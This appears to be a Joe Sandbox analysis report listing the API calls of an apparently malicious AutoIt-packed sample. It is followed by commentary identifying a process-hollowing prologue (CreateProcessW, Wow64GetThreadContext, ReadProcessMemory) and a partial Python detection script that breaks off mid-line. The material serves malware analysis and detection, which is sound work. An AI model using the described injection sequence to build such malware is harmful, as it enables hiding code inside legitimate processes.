                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                        • String ID:
                                                        • API String ID: 2782032738-0
                                                        • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                        • Instruction ID: c3657be4da76fecce3eeac7b6d9c654a19599e76888952728a66fc3304b279c5
                                                        • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                        • Instruction Fuzzy Hash: 8D41A675A027C5ABDB18CE6BC8849AE77A6EF4D360F24857DE815C7640E778DD408B80
                                                        APIs
                                                        • _memset.LIBCMT ref: 007FEA39
                                                        • GetOpenFileNameW.COMDLG32(?), ref: 007FEA83
                                                          • Part of subcall function 007C4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007C4743,?,?,007C37AE,?), ref: 007C4770
                                                          • Part of subcall function 007E0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 007E07B0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                        • String ID: X
                                                        • API String ID: 3777226403-3081909835
                                                        • Opcode ID: 26eedb95a51af1f963b769c3366e255866fe8e74a45883d488024173660656dd
                                                        • Instruction ID: ad6c310a20f64281dbbc20b1b333f7f63cb05757f95f52022748aa19ae789036
                                                        • Opcode Fuzzy Hash: 26eedb95a51af1f963b769c3366e255866fe8e74a45883d488024173660656dd
                                                        • Instruction Fuzzy Hash: 32216271A14248DBCB559F98C849BEE7BF8AF49714F00805DE508A7241DFB85989CF91
                                                        APIs
                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 008298F8
                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 0082990F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Temp$FileNamePath
                                                        • String ID: aut
                                                        • API String ID: 3285503233-3010740371
                                                        • Opcode ID: 82e651122b5ca991c8fa2f877f591da318407d3533a66c7472b3118bfe17a227
                                                        • Instruction ID: 0694cbc2ae5d9e1765e03d35a87456403695d741648112150556685913d2c6af
                                                        • Opcode Fuzzy Hash: 82e651122b5ca991c8fa2f877f591da318407d3533a66c7472b3118bfe17a227
                                                        • Instruction Fuzzy Hash: BAD05E7958031DABDB509BA0DC0EF9AB73CF704700F0042B1BB54D11A2EAB09598CB91
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 2af2c8ff753828010570fb2bba58bb30b67c64387fdbb3d845bd899b9aef9697
                                                        • Instruction ID: 38bd12c8c32d4f923abae75793adb8273026ff4fa975b3f188fffac8ccfb1c0b
                                                        • Opcode Fuzzy Hash: 2af2c8ff753828010570fb2bba58bb30b67c64387fdbb3d845bd899b9aef9697
                                                        • Instruction Fuzzy Hash: 19F113716083059FCB14DF28C484A6ABBE5FFC8314F14892EF8999B251DB74E945CF82
                                                        APIs
                                                          • Part of subcall function 007E0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 007E0193
                                                          • Part of subcall function 007E0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 007E019B
                                                          • Part of subcall function 007E0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 007E01A6
                                                          • Part of subcall function 007E0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 007E01B1
                                                          • Part of subcall function 007E0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 007E01B9
                                                          • Part of subcall function 007E0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 007E01C1
                                                          • Part of subcall function 007D60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,007CF930), ref: 007D6154
                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 007CF9CD
                                                        • OleInitialize.OLE32(00000000), ref: 007CFA4A
                                                        • CloseHandle.KERNEL32(00000000), ref: 008045C8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                        • String ID:
                                                        • API String ID: 1986988660-0
                                                        • Opcode ID: fbcc9dafabd5874690177ac20d1534b0f9a5333a370fe38749c34ee67de67360
                                                        • Instruction ID: 0736d47e83df9ab3706d7861f68db05134d7db5895d2cd2d0133ce4120dcb3c8
                                                        • Opcode Fuzzy Hash: fbcc9dafabd5874690177ac20d1534b0f9a5333a370fe38749c34ee67de67360
                                                        • Instruction Fuzzy Hash: 3E819AF4901A40CFC784EFBDA959A197BE5FB99306790812EE119CB372EB744488CF19
                                                        APIs
                                                        • _memset.LIBCMT ref: 007C4370
                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 007C4415
                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 007C4432
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_$_memset
                                                        • String ID:
                                                        • API String ID: 1505330794-0
                                                        • Opcode ID: 9ff53578f782ef03283d5d3b855a7dc4ff4f2d9969fd5719a2bdb95a748a83a4
                                                        • Instruction ID: 97bb02cbe242424f6ee460d92821fe24b6b45a858c0e84764833d15479575b31
                                                        • Opcode Fuzzy Hash: 9ff53578f782ef03283d5d3b855a7dc4ff4f2d9969fd5719a2bdb95a748a83a4
                                                        • Instruction Fuzzy Hash: B93191B0504741DFD721DF28D894B9BBBF8FB59308F00092EE69A92251EB75A944CB52
                                                        APIs
                                                        • __FF_MSGBANNER.LIBCMT ref: 007E5733
                                                          • Part of subcall function 007EA16B: __NMSG_WRITE.LIBCMT ref: 007EA192
                                                          • Part of subcall function 007EA16B: __NMSG_WRITE.LIBCMT ref: 007EA19C
                                                        • __NMSG_WRITE.LIBCMT ref: 007E573A
                                                          • Part of subcall function 007EA1C8: GetModuleFileNameW.KERNEL32(00000000,008833BA,00000104,?,00000001,00000000), ref: 007EA25A
                                                          • Part of subcall function 007EA1C8: ___crtMessageBoxW.LIBCMT ref: 007EA308
                                                          • Part of subcall function 007E309F: ___crtCorExitProcess.LIBCMT ref: 007E30A5
                                                          • Part of subcall function 007E309F: ExitProcess.KERNEL32 ref: 007E30AE
                                                          • Part of subcall function 007E8B28: __getptd_noexit.LIBCMT ref: 007E8B28
                                                        • RtlAllocateHeap.NTDLL(00EC0000,00000000,00000001,00000000,?,?,?,007E0DD3,?), ref: 007E575F
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                        • String ID:
                                                        • API String ID: 1372826849-0
                                                        • Opcode ID: 4c931fdefa95b0fce458b456403d3a64991c4ede2b8ae0833f04c571ba8729d6
                                                        • Instruction ID: 32e747a40bafd7655488ccae8e23d86e2dc74a9a7fb211a95dc06361d28e2752
                                                        • Opcode Fuzzy Hash: 4c931fdefa95b0fce458b456403d3a64991c4ede2b8ae0833f04c571ba8729d6
                                                        • Instruction Fuzzy Hash: 4A012875203BD9DAD610277BEC4AA2E77989F8E766F110425F409AB1C2DF7C9C004761
                                                        APIs
                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,00829548,?,?,?,?,?,00000004), ref: 008298BB
                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,00829548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 008298D1
                                                        • CloseHandle.KERNEL32(00000000,?,00829548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008298D8
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: File$CloseCreateHandleTime
                                                        • String ID:
                                                        • API String ID: 3397143404-0
                                                        • Opcode ID: 35f39fbfd5482908120da244959c32b54dc66dbcc64fb7ab20c755516ca1cef1
                                                        • Instruction ID: 6e6d7b747716c03af1855114e070e68d4348ccc58a55333b5df2d93ee89590fd
                                                        • Opcode Fuzzy Hash: 35f39fbfd5482908120da244959c32b54dc66dbcc64fb7ab20c755516ca1cef1
                                                        • Instruction Fuzzy Hash: 36E08636140224B7D7221F64EC09FCA7B59FB07B60F144124FB54A90E187B12511D798
                                                        APIs
                                                        • _free.LIBCMT ref: 00828D1B
                                                          • Part of subcall function 007E2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,007E9A24), ref: 007E2D69
                                                          • Part of subcall function 007E2D55: GetLastError.KERNEL32(00000000,?,007E9A24), ref: 007E2D7B
                                                        • _free.LIBCMT ref: 00828D2C
                                                        • _free.LIBCMT ref: 00828D3E
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _free$ErrorFreeHeapLast
                                                        • String ID:
                                                        • API String ID: 776569668-0
                                                        • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                        • Instruction ID: 81c10356eac68a581871a4d3da830868d37e77806b69622799773c6cd327bfc3
                                                        • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                        • Instruction Fuzzy Hash: 7BE012A1743651C6DF24E579BD44B9313DC9F5C352714091EB50DD7187CE68F8878524
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID: CALL
                                                        • API String ID: 0-4196123274
                                                        • Opcode ID: 7f3d3c7882ed68146acce1b930443faa2c907b94f1b39fd6648d9b5f1a84311d
                                                        • Instruction ID: 70293fb9fbae68a87bca9041e9833a539b11084cc97763c8d02f6d03cfc98736
                                                        • Opcode Fuzzy Hash: 7f3d3c7882ed68146acce1b930443faa2c907b94f1b39fd6648d9b5f1a84311d
                                                        • Instruction Fuzzy Hash: C8222670608245DFC724DF24C495F6AB7E1BF84304F14896DE99A9B362DB39EC85CB82
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID: EA06
                                                        • API String ID: 4104443479-3962188686
                                                        • Opcode ID: 249a6ba41dc1a430aaf21293d414ee0339655c21d59115dca0279ced60070101
                                                        • Instruction ID: d83c5f93d73c4578b4998780b56f0c9919c698b13d8e431339da9b3c685968c7
                                                        • Opcode Fuzzy Hash: 249a6ba41dc1a430aaf21293d414ee0339655c21d59115dca0279ced60070101
                                                        • Instruction Fuzzy Hash: 80413C71B04158A7DF31AB648C75FBE7FB29B45310F28446DEE839B282D62C9D4483A1
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: _memmove
                                                        • String ID:
                                                        • API String ID: 4104443479-0
                                                        • Opcode ID: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                        • Instruction ID: 9e128192ad3c742a48aa718461d71acb3c828a78b2ff76ca565deb032141b395
                                                        • Opcode Fuzzy Hash: 75b3ef76dc9c1d7680ff1126038a0b5bca49f3ec50bdc15de679bd26e1e87542
                                                        • Instruction Fuzzy Hash: 8A314DB1604606AFC708DF69C891E69B3A9FF48320715C62DE519CB291EF78ED60CB90
                                                        APIs
                                                        • IsThemeActive.UXTHEME ref: 007C4834
                                                          • Part of subcall function 007E336C: __lock.LIBCMT ref: 007E3372
                                                          • Part of subcall function 007E336C: DecodePointer.KERNEL32(00000001,?,007C4849,00817C74), ref: 007E337E
                                                          • Part of subcall function 007E336C: EncodePointer.KERNEL32(?,?,007C4849,00817C74), ref: 007E3389
                                                          • Part of subcall function 007C48FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 007C4915
                                                          • Part of subcall function 007C48FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007C492A
                                                          • Part of subcall function 007C3B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 007C3B68
                                                          • Part of subcall function 007C3B3A: IsDebuggerPresent.KERNEL32 ref: 007C3B7A
                                                          • Part of subcall function 007C3B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,008852F8,008852E0,?,?), ref: 007C3BEB
                                                          • Part of subcall function 007C3B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 007C3C6F
                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 007C4874
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                        • String ID:
                                                        • API String ID: 1438897964-0
                                                        • Opcode ID: f8264aeaf1e0241bc7a9ccd1ab8125801880c7bff06b1539ba5c87e214057cfa
                                                        • Instruction ID: d9e05f589cf9cc771c9d9ad5042f393d71c4bf5159a2eee31c086d8a4b42ff80
                                                        • Opcode Fuzzy Hash: f8264aeaf1e0241bc7a9ccd1ab8125801880c7bff06b1539ba5c87e214057cfa
                                                        • Instruction Fuzzy Hash: 3A118971908341DBC700EF29E809A0EBFE8FF99750F10491EF040972B2DBB49A48CB92
                                                        APIs
                                                          • Part of subcall function 007E571C: __FF_MSGBANNER.LIBCMT ref: 007E5733
                                                          • Part of subcall function 007E571C: __NMSG_WRITE.LIBCMT ref: 007E573A
                                                          • Part of subcall function 007E571C: RtlAllocateHeap.NTDLL(00EC0000,00000000,00000001,00000000,?,?,?,007E0DD3,?), ref: 007E575F
                                                        • std::exception::exception.LIBCMT ref: 007E0DEC
                                                        • __CxxThrowException@8.LIBCMT ref: 007E0E01
                                                          • Part of subcall function 007E859B: RaiseException.KERNEL32(?,?,?,00879E78,00000000,?,?,?,?,007E0E06,?,00879E78,?,00000001), ref: 007E85F0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                        • String ID:
                                                        • API String ID: 3902256705-0
                                                        • Opcode ID: 07604dbdbdda548944655ea0cd5a264fc34bc933630a88c7852eaaf564299d06
                                                        • Instruction ID: a3f97473f11e983a07257f9b1733dbb54de8b214686a55da94c6305f417a3d47
                                                        • Opcode Fuzzy Hash: 07604dbdbdda548944655ea0cd5a264fc34bc933630a88c7852eaaf564299d06
                                                        • Instruction Fuzzy Hash: 1EF0A93150225DA6CB10FAEADC099DE77ACEF09311F104429FD18D6191DFB49A9486D1
                                                        APIs
                                                          • Part of subcall function 007E8B28: __getptd_noexit.LIBCMT ref: 007E8B28
                                                        • __lock_file.LIBCMT ref: 007E53EB
                                                          • Part of subcall function 007E6C11: __lock.LIBCMT ref: 007E6C34
                                                        • __fclose_nolock.LIBCMT ref: 007E53F6
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                        • String ID:
                                                        • API String ID: 2800547568-0
                                                        • Opcode ID: 13b6f6e7da91394954361ca87d492e75f1ce8e67ea7a243d05909b5f1527a20c
                                                        • Instruction ID: b0bc1b5b63fb1201a629bcf7284752ca5a26c63af77657ff5bdd0b7b57c26f8c
                                                        • Opcode Fuzzy Hash: 13b6f6e7da91394954361ca87d492e75f1ce8e67ea7a243d05909b5f1527a20c
                                                        • Instruction Fuzzy Hash: 61F09671903A88DAD750AB6798097AD77A06F4937DF348105A428AB1C1CFBC99415B52
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 00F739F3
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F73A89
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F73AAB
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668345500.0000000000F71000.00000040.00000020.00020000.00000000.sdmp, Offset: 00F71000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_f71000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                        • Instruction ID: 5a4606fda0cf389a81e6d15916c4348a8bf29a5f186c0b11ab8ee257b808fdae
                                                        • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                                                        • Instruction Fuzzy Hash: 2B12CE24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A5E77A4F81DF5A
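The function at 00F739F3 is the one worth stopping at in this run of listings. Its direct calls are CreateProcessW, then Wow64GetThreadContext with ContextFlags 0x10007 (CONTEXT_FULL for an x86 target), then a 4-byte ReadProcessMemory: the opening sequence of process hollowing, where the injector spawns a host, fetches the initial thread context, and reads the pointer-sized ImageBaseAddress out of the child's PEB. The memory dump source says where that code runs: a region whose name carries 00000040 and 00020000, consistent with PAGE_EXECUTE_READWRITE and MEM_PRIVATE, and that is not PE-backed, i.e. unpacked code rather than the AutoIt image at 007C0000. Two caveats: the listing shows only two CreateProcessW arguments, so CREATE_SUSPENDED is inferred, not observed, and the WriteProcessMemory / SetThreadContext / ResumeThread steps that would complete the technique are not in this function's own call list. The script below is an added example, not Joe Sandbox code or a tool the report references: it parses function blocks in this page's format and flags that prologue. The meaning of the dot-separated fields in the .sdmp file name is an assumption read off the names on this page, and the two sample blocks are transcribed from the report above.

```python
"""Triage of Joe Sandbox per-function 'APIs' listings for process hollowing.
Added example, not Joe Sandbox code: parses API and 'Source File' lines in this
page's format, matches the CreateProcess -> (Wow64)GetThreadContext ->
ReadProcessMemory prologue, and says whether the caller sits in private RWX
memory (an unpacked stage) rather than in the sample's own PE image."""
import re
from collections import namedtuple

# Documented Windows constants (winnt.h), not taken from the report.
CONTEXT_INTEGER = 0x2
CONTEXT_FULL_X86 = 0x00010007  # CONTEXT_i386 | CONTROL | INTEGER | SEGMENTS
PAGE_EXECUTE_READWRITE, MEM_IMAGE, MEM_PRIVATE = 0x40, 0x01000000, 0x00020000

# e.g. "• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F73A89"
API_RE = re.compile(
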